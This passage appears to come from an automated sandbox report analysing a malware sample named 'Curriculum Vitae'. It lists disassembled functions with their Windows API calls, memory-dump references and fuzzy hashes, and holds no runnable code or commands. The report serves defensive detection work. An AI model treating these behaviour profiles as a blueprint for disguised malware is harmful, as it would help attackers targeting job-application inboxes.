                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm
                      • API String ID: 1170836740-1018135373
                      • Opcode ID: ad2d4531a579b4944b80347806cf16773ff6c4774597a006ba7d0063ff0d272c
                      • Instruction ID: 16fa38e0210716b1ee399a97f4f118e8a965228061c5282818863207b855daba
                      • Opcode Fuzzy Hash: ad2d4531a579b4944b80347806cf16773ff6c4774597a006ba7d0063ff0d272c
                      • Instruction Fuzzy Hash: 78418734A00209ABCF14DF58C845AAE7BB5FF46365F188156ED145B352D7319A1DCBF0
                      Function 00DB10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00DB304E: inet_addr.WSOCK32(?), ref: 00DB307A
                        • Part of subcall function 00DB304E: _wcslen.LIBCMT ref: 00DB309B
                      • socket.WSOCK32(00000002,00000001,00000006), ref: 00DB1112
                      • WSAGetLastError.WSOCK32 ref: 00DB1121
                      • WSAGetLastError.WSOCK32 ref: 00DB11C9
                      • closesocket.WSOCK32(00000000), ref: 00DB11F9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                      • String ID:
                      • API String ID: 2675159561-0
                      • Opcode ID: 376537540ba7923d4cdb488d32855c51c3a3b1ba17210309838e88d568b2b01c
                      • Instruction ID: 2de24239490f58268773d6d8a22a5e3d2548d7cbd5bdfcf0c98606aaefd2ae5f
                      • Opcode Fuzzy Hash: 376537540ba7923d4cdb488d32855c51c3a3b1ba17210309838e88d568b2b01c
                      • Instruction Fuzzy Hash: 6241E335600705EFDB109F18C894BEAB7E9EF453A4F588059FA4A9B291C770ED41CBB0
                      Function 00D9CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D9DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00D9CF22,?), ref: 00D9DDFD
                        • Part of subcall function 00D9DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00D9CF22,?), ref: 00D9DE16
                      • lstrcmpiW.KERNEL32(?,?), ref: 00D9CF45
                      • MoveFileW.KERNEL32(?,?), ref: 00D9CF7F
                      • _wcslen.LIBCMT ref: 00D9D005
                      • _wcslen.LIBCMT ref: 00D9D01B
                      • SHFileOperationW.SHELL32(?), ref: 00D9D061
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                      • String ID: \*.*
                      • API String ID: 3164238972-1173974218
                      • Opcode ID: ae50b212d003d5825afbf7196ce7fdbafcfd9c48a0f6d0fcbd1b9dee8469934c
                      • Instruction ID: c94e913d40ae8a2ea51aeb29d686da30646971e57fbb4d14a144f79307359189
                      • Opcode Fuzzy Hash: ae50b212d003d5825afbf7196ce7fdbafcfd9c48a0f6d0fcbd1b9dee8469934c
                      • Instruction Fuzzy Hash: E54146719462195FDF12EFA4D981EDDB7B9EF48380F1410E6E509EB141EA34A688CF70
                      Function 00DC2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00DC2E1C
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00DC2E4F
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00DC2E84
                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00DC2EB6
                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00DC2EE0
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00DC2EF1
                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00DC2F0B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: LongWindow$MessageSend
                      • String ID:
                      • API String ID: 2178440468-0
                      • Opcode ID: 451435d85727cae6413fd2d0ff420841ea532a632730864288cd6775344a70eb
                      • Instruction ID: 63ec0b3a791a8a0c75e66e63b65b9359e70cbb459e738e8a5a6046a6791122ba
                      • Opcode Fuzzy Hash: 451435d85727cae6413fd2d0ff420841ea532a632730864288cd6775344a70eb
                      • Instruction Fuzzy Hash: 553126306442569FDB21DF59DC84FA537E8FB9A710F1801A8FA04EF2B1CB71A884DB21
                      Function 00D97726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                      Download Yara Rule
                      APIs
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D97769
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D9778F
                      • SysAllocString.OLEAUT32(00000000), ref: 00D97792
                      • SysAllocString.OLEAUT32(?), ref: 00D977B0
                      • SysFreeString.OLEAUT32(?), ref: 00D977B9
                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00D977DE
                      • SysAllocString.OLEAUT32(?), ref: 00D977EC
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                      • String ID:
                      • API String ID: 3761583154-0
                      • Opcode ID: 2e33b132015389ab3c76d0d4ddd76898c9f58336574c342e5f4ec24b2cf051e6
                      • Instruction ID: 96d33d2352c770059c9f033574063065381499fb73aaaef3391da9e0ca395149
                      • Opcode Fuzzy Hash: 2e33b132015389ab3c76d0d4ddd76898c9f58336574c342e5f4ec24b2cf051e6
                      • Instruction Fuzzy Hash: E521927661821AAFDF10DFE9CC88CBB77ACEB097647048025FA15DB260D670EC4187B0
                      Function 00D977FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                      Download Yara Rule
                      APIs
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D97842
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D97868
                      • SysAllocString.OLEAUT32(00000000), ref: 00D9786B
                      • SysAllocString.OLEAUT32 ref: 00D9788C
                      • SysFreeString.OLEAUT32 ref: 00D97895
                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00D978AF
                      • SysAllocString.OLEAUT32(?), ref: 00D978BD
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                      • String ID:
                      • API String ID: 3761583154-0
                      • Opcode ID: ed2dad96aba4e94139e9c5ec530211f5a1e8eb99c7ea6a9a0f5d51408ad4ab92
                      • Instruction ID: 2ee49faed0c6815ac14a9e2db22c5f533dab60134b7b87c1b989a950b8b2acbe
                      • Opcode Fuzzy Hash: ed2dad96aba4e94139e9c5ec530211f5a1e8eb99c7ea6a9a0f5d51408ad4ab92
                      • Instruction Fuzzy Hash: 44217131618205AFDF10AFE8DC88DAA77ECFB097607148125FA15CB2A1D670EC41CB74
                      Function 00DA04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                      Download Yara Rule
                      APIs
                      • GetStdHandle.KERNEL32(0000000C), ref: 00DA04F2
                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DA052E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CreateHandlePipe
                      • String ID: nul
                      • API String ID: 1424370930-2873401336
                      • Opcode ID: 2a00fe98bc53af3bbae4690521a2cd02ec6d83b5ea9a341330ce7b013f8e6c73
                      • Instruction ID: 45d9e4cbb346b45638ecb4652d40c0ed12470cd2f37ca3716939465b3acebc2b
                      • Opcode Fuzzy Hash: 2a00fe98bc53af3bbae4690521a2cd02ec6d83b5ea9a341330ce7b013f8e6c73
                      • Instruction Fuzzy Hash: 4C218B71900306AFDF209F69DC44A9ABFB4AF46764F244A19F9A1D62E0E770D950CF30
                      Function 00DA05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                      Download Yara Rule
                      APIs
                      • GetStdHandle.KERNEL32(000000F6), ref: 00DA05C6
                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DA0601
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CreateHandlePipe
                      • String ID: nul
                      • API String ID: 1424370930-2873401336
                      • Opcode ID: 479ef5d27a8d05c94aad6fc970d6abad5719b0db11171806f35c39d446625143
                      • Instruction ID: f6a63381afa245a326b4c27c2218faf67c258d07fc1eefa09491d8184bb0ff39
                      • Opcode Fuzzy Hash: 479ef5d27a8d05c94aad6fc970d6abad5719b0db11171806f35c39d446625143
                      • Instruction Fuzzy Hash: 112165755003069FDB209F69DC04E5A7BE4BF96724F280A19F9A1E72D0E770D960CB70
                      Function 00DC40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D3600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D3604C
                        • Part of subcall function 00D3600E: GetStockObject.GDI32(00000011), ref: 00D36060
                        • Part of subcall function 00D3600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D3606A
                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00DC4112
                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00DC411F
                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00DC412A
                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00DC4139
                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00DC4145
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$CreateObjectStockWindow
                      • String ID: Msctls_Progress32
                      • API String ID: 1025951953-3636473452
                      • Opcode ID: 0a115bcd92523c2a988ba6939be27ddc0fd1f20328331c33cb97a56cb8bf52c1
                      • Instruction ID: cdf1c123935825d5f64b37f81b30e638099c1a49a4da461275545a7939aaadca
                      • Opcode Fuzzy Hash: 0a115bcd92523c2a988ba6939be27ddc0fd1f20328331c33cb97a56cb8bf52c1
                      • Instruction Fuzzy Hash: 5B1190B215021ABEEF118F64CC86EE77F9DEF08798F018111FB58A6150C672DC619BB4
                      Function 00D6D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D6D7A3: _free.LIBCMT ref: 00D6D7CC
                      • _free.LIBCMT ref: 00D6D82D
                        • Part of subcall function 00D629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000), ref: 00D629DE
                        • Part of subcall function 00D629C8: GetLastError.KERNEL32(00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000,00000000), ref: 00D629F0
                      • _free.LIBCMT ref: 00D6D838
                      • _free.LIBCMT ref: 00D6D843
                      • _free.LIBCMT ref: 00D6D897
                      • _free.LIBCMT ref: 00D6D8A2
                      • _free.LIBCMT ref: 00D6D8AD
                      • _free.LIBCMT ref: 00D6D8B8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                      • Instruction ID: c50fb5f14624c33c03f07dae5e05c4573e4387a91d28e75e31199b8ce8a3ce9b
                      • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                      • Instruction Fuzzy Hash: 71115E71B80B04ABD621BFB0DC47FDB7BDDEF40700F440826B29AA6092DB75B5058A71
                      Function 00D9DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00D9DA74
                      • LoadStringW.USER32(00000000), ref: 00D9DA7B
                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00D9DA91
                      • LoadStringW.USER32(00000000), ref: 00D9DA98
                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00D9DADC
                      Strings
                      • %s (%d) : ==> %s: %s %s, xrefs: 00D9DAB9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: HandleLoadModuleString$Message
                      • String ID: %s (%d) : ==> %s: %s %s
                      • API String ID: 4072794657-3128320259
                      • Opcode ID: de4b73fd31a9adfbcb1eb767904d7050dac577a714f7ceb3367e88057da2d6a1
                      • Instruction ID: 7e912bbefb13599e0a23cec177888a8f36ac8f25438ae580f2e7933b1f88a4c0
                      • Opcode Fuzzy Hash: de4b73fd31a9adfbcb1eb767904d7050dac577a714f7ceb3367e88057da2d6a1
                      • Instruction Fuzzy Hash: F50186F25103097FEB10ABA49D89EF7736CE708301F405495F74AE2141EA749E844F74
                      Function 00DA096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                      Download Yara Rule
                      APIs
                      • InterlockedExchange.KERNEL32(016DF320,016DF320), ref: 00DA097B
                      • EnterCriticalSection.KERNEL32(016DF300,00000000), ref: 00DA098D
                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 00DA099B
                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00DA09A9
                      • CloseHandle.KERNEL32(00000000), ref: 00DA09B8
                      • InterlockedExchange.KERNEL32(016DF320,000001F6), ref: 00DA09C8
                      • LeaveCriticalSection.KERNEL32(016DF300), ref: 00DA09CF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                      • String ID:
                      • API String ID: 3495660284-0
                      • Opcode ID: f0a62f47246aeb2fcbb23e26117d0c090004dc60db8ab23c14987cef9f6cfbd3
                      • Instruction ID: b4936c42a015f723ee1743ecf439163ee76972db9972ffa278318d1f892616fa
                      • Opcode Fuzzy Hash: f0a62f47246aeb2fcbb23e26117d0c090004dc60db8ab23c14987cef9f6cfbd3
                      • Instruction Fuzzy Hash: 0CF01932552A03ABD7415BA4EE88ED6BA29FF01702F482025F206909A0C7749465CFA4
                      Function 00D601B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                      Download Yara Rule
                      APIs
                      • __allrem.LIBCMT ref: 00D600BA
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D600D6
                      • __allrem.LIBCMT ref: 00D600ED
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D6010B
                      • __allrem.LIBCMT ref: 00D60122
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D60140
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                      • String ID:
                      • API String ID: 1992179935-0
                      • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                      • Instruction ID: da66c4f19807201aceba773c6e0006f45dee016493192dfa525c99c42572610e
                      • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                      • Instruction Fuzzy Hash: AF81E772A007069BEB249F68CC41B6B77E9EF41324F28463AF951DB681E774D9448BB0
                      Function 00D661FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                      Download Yara Rule
                      APIs
                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D582D9,00D582D9,?,?,?,00D6644F,00000001,00000001,8BE85006), ref: 00D66258
                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D6644F,00000001,00000001,8BE85006,?,?,?), ref: 00D662DE
                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D663D8
                      • __freea.LIBCMT ref: 00D663E5
                        • Part of subcall function 00D63820: RtlAllocateHeap.NTDLL(00000000,?,00E01444,?,00D4FDF5,?,?,00D3A976,00000010,00E01440,00D313FC,?,00D313C6,?,00D31129), ref: 00D63852
                      • __freea.LIBCMT ref: 00D663EE
                      • __freea.LIBCMT ref: 00D66413
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                      • String ID:
                      • API String ID: 1414292761-0
                      • Opcode ID: 8e65e83da60e4839af847c3f533adcf5ec4b18ab6ced1b23158081a72f20e2ac
                      • Instruction ID: c02e00e1233498af0d32b4a3cf058d6fe61d870443300026737e1522d507ed8f
                      • Opcode Fuzzy Hash: 8e65e83da60e4839af847c3f533adcf5ec4b18ab6ced1b23158081a72f20e2ac
                      • Instruction Fuzzy Hash: BD51BF72A00216ABEB258F64DC81EBF7BA9EF44750F1D462AFD05DA240EB34DC50C6B0
                      Function 00DBBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                        • Part of subcall function 00DBC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DBB6AE,?,?), ref: 00DBC9B5
                        • Part of subcall function 00DBC998: _wcslen.LIBCMT ref: 00DBC9F1
                        • Part of subcall function 00DBC998: _wcslen.LIBCMT ref: 00DBCA68
                        • Part of subcall function 00DBC998: _wcslen.LIBCMT ref: 00DBCA9E
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DBBCCA
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DBBD25
                      • RegCloseKey.ADVAPI32(00000000), ref: 00DBBD6A
                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00DBBD99
                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00DBBDF3
                      • RegCloseKey.ADVAPI32(?), ref: 00DBBDFF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                      • String ID:
                      • API String ID: 1120388591-0
                      • Opcode ID: 4601011785d84e2d5877fe90bc11576aff447eb98adfa43379bb789b6b1fc5d1
                      • Instruction ID: 1a266ff0e126506a752aeea73038098c446ba4e999fe53843498c7dfe33bc26f
                      • Opcode Fuzzy Hash: 4601011785d84e2d5877fe90bc11576aff447eb98adfa43379bb789b6b1fc5d1
                      • Instruction Fuzzy Hash: 75818D30208241EFC714DF24C891E6ABBE5FF84318F54855DF59A8B2A2CB71ED45CBA2
                      Function 00D8F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
